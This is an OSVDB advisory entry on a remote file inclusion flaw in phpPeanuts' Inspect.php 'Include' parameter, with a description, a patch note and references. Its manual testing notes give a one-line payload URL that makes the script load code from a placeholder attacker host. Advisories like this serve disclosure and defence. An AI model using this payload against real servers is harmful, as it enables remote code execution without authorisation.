phpPeanuts Inspect.php Include Variable Remote File Inclusion

2006-11-14T04:19:09
ID OSVDB:30397
Type osvdb
Reporter Hidayat Sagita(hidayat.sagita@gmail.com)
Modified 2006-11-14T04:19:09

Description

Vulnerability Description

phpPeanuts contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to Inspect.php not properly sanitizing user input supplied to the 'Include' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, phpPeanuts has released a patch to address this vulnerability.

Short Description

phpPeanuts contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to Inspect.php not properly sanitizing user input supplied to the 'Include' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://[attacker]/evil_code.txt?

References:

Secunia Advisory ID:22873 Generic Exploit URL: http://www.milw0rm.com/exploits/2778 FrSIRT Advisory: ADV-2006-4513 CVE-2006-5948 Bugtraq ID: 21057